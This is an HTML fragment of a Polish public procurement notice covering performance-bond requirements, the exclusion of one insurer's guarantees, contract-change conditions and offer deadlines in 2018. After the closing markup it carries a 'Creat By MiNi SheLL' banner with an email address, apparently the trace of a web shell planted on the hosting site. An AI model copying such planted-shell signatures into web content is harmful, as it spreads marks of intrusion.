id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">1. Informacje ogólne. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lubnienależytego wykonania umowy. 2. Wysokość zabezpieczenia należytego wykonania umowy. 1)Zamawiający ustala zabezpieczenie należytego wykonania umowy zawartej w wynikupostępowania o udzielenie niniejszego zamówienia w wysokości 10% ceny całkowitej podanej wofercie. 2) Wybrany Wykonawca zobowiązany jest wnieść zabezpieczenie należytego wykonaniaumowy przed podpisaniem umowy (nie wniesienie zabezpieczenia należytego wykonania umowyjest jedną z przesłanek zatrzymania wadium). 3. Forma zabezpieczenia należytego wykonaniaumowy. 1) Zabezpieczenie należytego wykonania umowy może być wniesione według wyboruWykonawcy w jednej lub w kilku następujących formach: a) pieniądzu, b) poręczeniachbankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym żezobowiązanie kasy jest zawsze zobowiązaniem pieniężnym, c) gwarancjach bankowych, d)gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez podmioty, o których mowa wart. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji RozwojuPrzedsiębiorczości. 2) Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaci przelewem nanastępujący rachunek bankowy Zamawiającego: Bank Ochrony Środowiska II Oddział Warszawa95 1540 1157 2001 6680 8633 0003 3) W przypadku wniesienia wadium w pieniądzu Wykonawcamoże wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia. 4) Jeżelizabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanymrachunku bankowym. 5) W przypadku składania przez Wykonawcę zabezpieczenia w formiegwarancji / poręczenia, gwarancja / poręczenie powinny być sporządzone zgodnie zobowiązującym prawem i winne zawierać następujące elementy: a) nazwę dającego zlecenie(Wykonawcy), beneficjenta gwarancji / poręczenia (Zamawiającego), gwaranta / poręczyciela(banku lub instytucji ubezpieczeniowej udzielających gwarancji / poręczenia) oraz wskazanie ichsiedzib; b) określenie wierzytelności, która ma być zabezpieczona gwarancją / poręczeniem; c)kwotę gwarancji / poręczenia; d) termin ważności gwarancji / poręczenia; e) Z treścizabezpieczenia przedstawionego w formie gwarancji / poręczenia winno wynikać, że bank,ubezpieczyciel, poręczyciel zapłaci, na rzecz Zamawiającego w terminie maksymalnie 30 dni odpisemnego żądania kwotę zabezpieczenia, na pierwsze wezwanie Zamawiającego, bez odwołania,bez warunku, niezależnie od kwestionowania czy zastrzeżeń Wykonawcy i bez dochodzenia czywezwanie Zamawiającego jest uzasadnione czy nie. f) Gwarancja / poręczenie muszą byćpodpisane przez upoważnionego przedstawiciela Gwaranta / Poręczyciela. Podpis musi byćsporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lubczytelny (z podaniem imienia i nazwiska). 6) W przypadku zabezpieczenia należytego wykonaniaumowy wnoszonego w formie innej, niż pieniądz, Zamawiający wymaga przesłania projektu treścidokumentu gwarancyjnego do akceptacji przed wyznaczonym terminem zawarcia umowy. 7) JeżeliWykonawca, którego oferta została wybrana nie wniesie zabezpieczenia należytego wykonaniaumowy, Zamawiający wybiera najkorzystniejszą ofertę spośród pozostałych ofert stosownie dotreści art. 94 ust. 3 Pzp. 8) Do zmiany formy zabezpieczenia umowy w trakcie realizacji umowystosuje się art. 149 Pzp. 9) Zamawiający nie dopuszcza wniesienia (uzna za niewniesione)zabezpieczenia należytego wykonania umowy w formie gwarancji ubezpieczeniowej wystawionejprzez UNIQA Towarzystwo Ubezpieczeń Spółka Akcyjna. Zamawiający zatrzyma wadium wraz zodsetkami, jeśli Wykonawca wniósł zabezpieczenie należytego wykonania umowy, w sposób, októrym mowa w zdaniu poprzednim. Przyczyną wyłączenia z kręgu gwarantów wskazanegopodmiotu jest spór sądowy zawisły na tle odmowy spełnienia świadczenia gwarancyjnego przezwymienione Towarzystwo Ubezpieczeniowe, mimo dopełnienia przez Zamawiającego wszelkichwymogów formalnych. Z uwagi na powyższe, istnieje uzasadniona obawa Zamawiającego, iżgwarancje ubezpieczeniowe wystawione przez ww. Towarzystwo nie spełnią swej roli wynikającejz przepisów ustawy Prawo zamówień publicznych oraz Kodeks cywilny. 4. Zwrot zabezpieczenianależytego wykonania umowy. 1) Zamawiający zwróci 70% zabezpieczenia w terminie 30 dni oddnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane. 2)Zamawiający pozostawi na zabezpieczenie roszczeń z tytułu rękojmi za wady kwotę wynoszącą30% wysokości zabezpieczenia. 3) Kwota, o której mowa w poprzednim punkcie jest zwracana niepóźniej niż w 15 dniu po upływie okresu rękojmi za wady. 4) Zamawiający zwraca zabezpieczeniewniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym byłoono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej zaprzelew pieniędzy na rachunek bankowy Wykonawcy.</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zamawiający dopuszcza następujące warunki zmiany treści umowy: 1) Zawieszenie terminurealizacji zamówienia, określonego w § 3 umowy, w przypadku wystąpienia opóźnień wynikających z:a) wystąpienia warunków atmosferycznych oraz ich skutków, uniemożliwiających prowadzenie robótzgodnie ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych. Fakt wystąpienianiniejszych okoliczności musi być niezwłocznie potwierdzony w dzienniku budowy wpisemdokonanym przez kierownika budowy, potwierdzonym przez inspektora nadzoru inwestorskiego. b)wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć w chwili zawarciaumowy pomimo zachowania należytej staranności. Fakt wystąpienia niniejszych okoliczności musibyć potwierdzony w dzienniku budowy wpisem dokonanym przez kierownika robót potwierdzonymprzez inspektora nadzoru inwestorskiego. 2) W przedstawionych w ust. 1 przypadkach wystąpieniaopóźnień strony ustalą nowy termin realizacji, przy czym minimalny okres przesunięcia terminuzakończenia robót będzie równy okresowi zawieszenia. 3) Zawieszenie, o którym mowa w ust. 1zostaje zniesione w przypadku ustania okoliczności powodujących jego zaistnienie. Fakt ustaniaokoliczności, o których mowa w ust. 1 musi być potwierdzony w dzienniku budowy wpisemdokonanym przez kierownika robót potwierdzonym przez inspektora nadzoru inwestorskiego. 4) Wprzypadku odmowy wydania lub zwłoki w wydaniu przez organy administracji lub inne podmiotywymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, w tymodmowy udostępnienia przez właścicieli, posesji do celów realizacji inwestycji - termin realizacjiprzedmiotu umowy może ulec odpowiedniemu przedłużeniu, jednak nie dłużej niż okres trwania tychokoliczności. 5) W przypadku udzielenia przed terminem zakończenia przedmiotu umowy, zamówień,o których mowa w art. 67 ust. 1 pkt 6 Pzp, których wykonanie ma wpływ na termin realizacjizamówienia podstawowego. 6) Zamawiający przewiduje możliwość przedłużenia terminu realizacjizamówienia, w przypadku powierzenia przez Zamawiającego dodatkowego zakresu robót napodstawie art. 144 ust. 1 pkt 6 Pzp. 5) W przypadku wejścia w życie zmiany przepisów w zakresiewysokości podatku od towarów i usług (VAT) mających zastosowanie w czasie realizacji umowy,wynagrodzenie brutto Wykonawcy za część robót wykonywaną po tym terminie ulegnie stosownymzmianom natomiast wartość wynagrodzenia netto pozostanie bez zmian. 2. Zmiana postanowieńumowy wymaga zachowania formy pisemnego aneksu pod rygorem nieważności z zastrzeżeniem ust.3. 3. Poniższe zmiany Umowy nie wymagają zachowania formy pisemnego aneksu pod rygoremnieważności, a zostaną dokonane poprzez pisemne zgłoszenie potwierdzone przez drugą stronęUmowy: 1) zmiana na stanowisku kierownika robót, 2) zmiana na stanowisku inspektora nadzoruinwestorskiego, 3) zmiana na stanowisku koordynatora umowy, 4) zmiana konta bankowegoWykonawcy, 5) zmiana adresu Wykonawcy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-08-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">POLSKI</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data">2018-09-19</span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres"></span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Szczegółowe warunki dotyczące przedmiotowego postępowania zawarte są w specyfikacji istotnychwarunków zamówienia zamieszczonej na stronie internetowej Zamawiającego.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com